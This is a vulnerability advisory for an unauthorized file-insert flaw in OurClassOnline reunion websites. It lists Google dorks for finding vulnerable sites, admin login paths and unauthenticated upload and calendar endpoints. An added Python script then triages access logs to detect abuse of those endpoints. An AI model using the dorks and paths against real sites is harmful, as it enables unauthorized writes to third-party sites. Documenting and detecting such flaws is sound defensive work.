Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability

2018.11.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#################################################################################################
# Exploit Title : Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 13/11/2018
# Vendor Homepage : webportalpeople.com ~ ourclassonline.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks :
intext:''To obtain a site like this for your class visit www.ourclassonline.com.''
intext:''Copyright Web Portal People, LLC. 2018 - Maker of class reunion & family websites. All rights reserved.''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
#################################################################################################
# Admin and Moderator Panel Login Paths :
/admin/index.php
/login_form.php?action=reunion
/login_form.php?action=news
/login_form.php?action=classmates
/login_form.php?action=gallery&galleryid=6
/login_form.php?action=gallery&galleryid=2
/login_form.php?action=gallery&galleryid=3
/login_form.php?action=year_review
/login_form.php?action=gallery&galleryid=4
#################################################################################################
# Exploit :
/forum_topic_create.php?forumid=1
/files_forum/[RANDOM-NUMBER]_[YOUR-FILENAME-HERE].txt
/calendar_add.php
/calendar_event.php?eventid=[RANDOM-NUMBER]
#################################################################################################
# Example Vulnerable Sites =>
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
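For site operators, an access-log triage for the endpoints listed under "Exploit" above. This is an added example, not part of the original advisory or the vendor's code. It assumes Combined Log Format, that a session begins with a successful POST to one of the listed login paths, and that a client can be tracked by IP address; the log lines are constructed.

```python
import re
from collections import defaultdict

# Paths taken from the advisory: endpoints that accept content, and login pages.
WRITE_PATHS = ("/forum_topic_create.php", "/calendar_add.php")
LOGIN_PATHS = ("/login_form.php", "/admin/index.php")
# Stored attachments: /files_forum/[RANDOM-NUMBER]_[FILENAME]
UPLOAD_RE = re.compile(r"^/files_forum/\d+_[^/]+$")
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample log (documentation IP ranges, invented file name).
SAMPLE_LOG = """
198.51.100.7 - - [13/Nov/2018:10:00:01 +0000] "POST /login_form.php?action=news HTTP/1.1" 302 0
198.51.100.7 - - [13/Nov/2018:10:00:09 +0000] "POST /forum_topic_create.php?forumid=1 HTTP/1.1" 200 512
203.0.113.9 - - [13/Nov/2018:10:02:00 +0000] "POST /forum_topic_create.php?forumid=1 HTTP/1.1" 200 512
203.0.113.9 - - [13/Nov/2018:10:02:03 +0000] "GET /files_forum/48213_note.txt HTTP/1.1" 200 20
203.0.113.9 - - [13/Nov/2018:10:02:10 +0000] "POST /calendar_add.php HTTP/1.1" 302 0
192.0.2.4 - - [13/Nov/2018:10:03:00 +0000] "GET /forum_topic_create.php?forumid=1 HTTP/1.1" 200 900
"""

def triage(lines):
    """Flag clients that POST to a write endpoint without an earlier login POST,
    and record which stored attachments those clients fetched afterwards."""
    logged_in = set()
    suspects = defaultdict(lambda: {"writes": [], "uploads": []})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # blank or malformed line
        ip, ts, method, target, status = m.groups()
        path = target.split("?", 1)[0]
        ok = status.startswith(("2", "3"))
        if method == "POST" and path in LOGIN_PATHS and ok:
            # Assumption: treated as a login; a failed login that also returns
            # 200 would hide that client, so review login handling separately.
            logged_in.add(ip)
        elif method == "POST" and path in WRITE_PATHS and ok and ip not in logged_in:
            suspects[ip]["writes"].append((ts, target))
        elif method == "GET" and UPLOAD_RE.match(path) and ip in suspects:
            suspects[ip]["uploads"].append((ts, path))
    return dict(suspects)

if __name__ == "__main__":
    for ip, hits in triage(SAMPLE_LOG.splitlines()).items():
        print(ip, len(hits["writes"]), "unauthenticated writes,",
              len(hits["uploads"]), "attachment fetches")
```

Files named in the `uploads` list are the ones to inspect and remove from `/files_forum/` first.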



Copyright 2019, cxsecurity.com

 
